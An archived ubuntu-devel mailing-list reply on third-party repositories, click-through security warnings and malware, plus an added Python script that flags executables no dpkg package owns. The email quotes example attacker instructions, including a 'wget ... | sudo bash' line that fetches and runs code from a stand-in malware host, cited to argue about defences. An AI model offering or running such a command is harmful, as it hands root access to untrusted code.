Untrusted software and security click-through warnings

Kees Cook kees at ubuntu.com
Fri Sep 28 20:14:48 BST 2007


I, too, agree with most of what you're saying.  Besides my own worries,
I have noted at least one bug[1] asking for the same.

[1] https://launchpad.net/bugs/139227

On Fri, Sep 28, 2007 at 03:56:31PM +0100, Ian Jackson wrote:
>  * Yes, click-through addition of PPAs whose uploaders we bless
>     and for which someone will provide security support

It seems that some knowledge of who owns a PPA should factor into the key
management for that PPA.  For example, someone who isn't MOTU shouldn't
get automatic installation of packages onto users' systems from "main".

> We can't stop third parties writing on their website
>   "Now go to   Settings / Advanced / Trusted Software Sources
>    and select   Add Absolute URL
>    and paste in   http://malware.example.com/ubuntu/
>    say `confirm' to the security warning and enter your password"

As I understand it, this is already how many 3rd party repositories are
getting added to people's systems.  It's commonly recommended in many
(3rd party) guides about using Ubuntu.  I'm not sure the average user
would find it "surprising".

>   "Select  Applications / Accessories / Terminal
>    In the window type
>      sudo apt-add-untrusted-repository --force-security-override http://malware.example.com/ubuntu/
>    and type in your password when prompted."
> but even a naive user can be expected to smell a rat there.

Right, that sort of language might help, but dedicated 3rd parties that
don't want to get involved in the Ubuntu development community will
still find ways to bypass it:

   "Select  Applications / Accessories / Terminal
    In the window type
      wget -O - http://malware.example.com/happy-goodness | sudo bash
    and type in your password when prompted."

I'm hoping the simple lack of click-through installations will be a
strong enough deterrent.

> But the alternative is that in 5 years' time our users' systems will
> be malware-infested nightmares.

I think we need to separate the discussion of "3rd Party Applications"
and "Malware".  While Malware is technically 3PA, I think there is a
technical and philosophical difference between the two, in that most
3PAs are making software to help a subset of users, and Malware to take
advantage of a subset of users.  There is, obviously, a continuum:

- Ubuntu repository software (QC'd via Debian & ubuntu-*dev, Safe, Free)
- PPA repository software (less QC, less Safe, contractually Free)
- 3PA repository software (lesser QC, less Safe, unknown Freedom)
- 3PA non-repository software (least QC, unsafe, non-Free)
- Malware (no QC, dangerous, non-Free)

I don't think there is much difference between the PPA repo and 3PA
repo -- in both situations, the person providing the software is
attempting to make it available in an "easy" way for the end-user.  I think
key management can be the way to make the PPAs stand out here.

Another reason to split the 3PA from Malware is that while the 3PA
folks may have (inappropriate) instructions on their website, Malware
is going to use any method possible to get installed -- they're not going to
follow any rules or systems we create.  So, there are two things needed
(though I do recognize they overlap): "guide 3PA into the right place",
"stop Malware".

I'm curious if it might help to create some kind of "rms"-like (or
"tripwire"-like) tool that yells about executables not belonging to a
package from a known-good repository.  Of course it wouldn't easily stop
things like evil Firefox extensions.

> Or to put it another way: the point of Ubuntu is to give users control
> over their own computers - that is, Freedom.  Our job includes
> defending that control against those who would risk it in the name of
> temporary convenience.



Kees Cook
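An added illustration of the "tripwire"-like check floated above; this is example code written for this page, not code from the thread, from Ubuntu, or from any shipped tool. It answers one narrow question: which executables on the PATH are not claimed by any installed package? Ownership comes from dpkg's per-package file lists in /var/lib/dpkg/info/*.list, which is a real dpkg path; the function names, the sample package list and the sample binaries are all made up here so the script runs offline. It does not check which repository a package came from, does not verify that owned files are unmodified (debsums does that), and, as the message notes, cannot see things like browser extensions.

```python
#!/usr/bin/env python3
"""Flag PATH executables that no installed dpkg package owns.

Added example, not from the original message. Real input on an Ubuntu
system is /var/lib/dpkg/info/*.list; the demo tree below is constructed.
"""
import os
import stat
import tempfile
from pathlib import Path

DPKG_INFO = "/var/lib/dpkg/info"  # real dpkg location; demo avoids it


def path_variants(path):
    """Spellings under which dpkg might have recorded this file.

    Covers symlinked entries (resolve()) and usr-merged systems, where a
    file found as /usr/bin/ls may be listed by dpkg as /bin/ls or vice versa.
    """
    p = Path(path)
    variants = {str(p)}
    try:
        variants.add(str(p.resolve()))
    except OSError:
        pass
    for v in list(variants):
        if v.startswith("/usr/"):
            variants.add(v[len("/usr"):])
        else:
            variants.add("/usr" + v)
    return variants


def load_owned_paths(info_dir=DPKG_INFO):
    """Map every path in the *.list files to the package that owns it."""
    owned = {}
    for listfile in sorted(Path(info_dir).glob("*.list")):
        pkg = listfile.stem  # e.g. "coreutils" or "libc6:amd64"
        for line in listfile.read_text(errors="replace").splitlines():
            line = line.strip()
            if line:
                owned[line] = pkg
    return owned


def is_executable_file(path):
    """True for a regular file (following symlinks) with any execute bit set."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & 0o111)


def find_unowned_executables(bin_dirs, owned):
    """Return executables in bin_dirs that no package in `owned` lists."""
    unowned = []
    for d in bin_dirs:
        d = Path(d)
        if not d.is_dir():
            continue
        for entry in sorted(d.iterdir()):
            if not is_executable_file(entry):
                continue
            if path_variants(entry).isdisjoint(owned):
                unowned.append(str(entry))
    return unowned


def build_demo_tree(root):
    """Constructed sample (not real data): two packaged binaries, a symlink
    to one of them, a non-executable file, and one dropped-in executable.
    Returns (info_dir, bin_dir)."""
    root = Path(root)
    info, binp = root / "dpkg-info", root / "bin"
    info.mkdir()
    binp.mkdir()
    for name in ("ls", "cat", "dropper"):
        f = binp / name
        f.write_text("#!/bin/sh\necho hello\n")
        f.chmod(0o755)
    (binp / "README").write_text("not executable\n")
    (binp / "vdir").symlink_to("cat")  # symlink to an owned binary
    (info / "coreutils.list").write_text(
        f"{binp}/ls\n{binp}/cat\n/usr/share/doc/coreutils\n")
    return info, binp


def demo():
    """Run the check over the constructed tree; returns unowned basenames."""
    with tempfile.TemporaryDirectory() as tmp:
        info, binp = build_demo_tree(tmp)
        hits = find_unowned_executables([binp], load_owned_paths(info))
        return [Path(h).name for h in hits]


if __name__ == "__main__":
    if Path(DPKG_INFO).is_dir():
        path_dirs = os.environ.get("PATH", "").split(":")
        hits = find_unowned_executables(path_dirs, load_owned_paths())
    else:
        hits = demo()
    for h in hits:
        print("unowned executable:", h)
```

On a real Ubuntu box the script walks the caller's PATH against dpkg's lists; without dpkg it runs the constructed demo, where only the dropped-in "dropper" is reported and the symlink "vdir" is accepted because it resolves to an owned file. Expect some noise from locally built software under /usr/local, which is exactly the "3PA non-repository" tier in the list above.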

More information about the ubuntu-devel mailing list